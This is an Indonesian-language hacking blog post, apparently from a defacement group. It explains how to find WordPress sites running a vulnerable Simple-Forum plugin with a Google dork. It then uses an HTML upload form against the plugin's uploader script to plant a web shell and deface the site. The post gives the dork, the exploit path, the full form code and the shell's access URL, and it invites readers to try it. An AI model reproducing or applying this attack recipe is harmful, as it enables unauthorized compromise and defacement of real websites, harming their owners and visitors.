SukabumiBlackHat

Tutorial Deface,Hacking,and All about IT

Tutorial Deface Wp Plugins Simple-Forum

Unknown 9:39 AM , No comments


okeh gais kali ini gue mau bagi bagi tutorial deface 

Tutorial Deface Wp Plugins Simple-Forum


langsung aja 

yang harus lu sedian adalah :

  • koneksi
  • kesabaran
  • dork
  • csrf
Nah kalo udah terkumpul tinggal mainkan
Dork nya :
inurl:/wp-content/plugins/simple-forum
exploit: /wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php

 1.dorking dulu di gugel :v gan
2.kalo vuln muncul error kek di gambar liat 

kalo gx vuln kek gini


3.Nah kalo udah nemu yang error tinggal masukin ke csrf 
csrf nya ini 

<form enctype="multipart/form-data" 
action="targetlu" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

save dengan extensi html

4.Buka CSRF nya  dan upload file kesayangan lu 
Kalo berhasil akan muncul tulisan succes

akses nya : 

www.site.com/[path]/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php


ezy kan :v silahkan coba :V

No comments :

Post a Comment

Subscribe to: Post Comments ( Atom )

Recent Posts

Contact Form

Name

Email *

Message *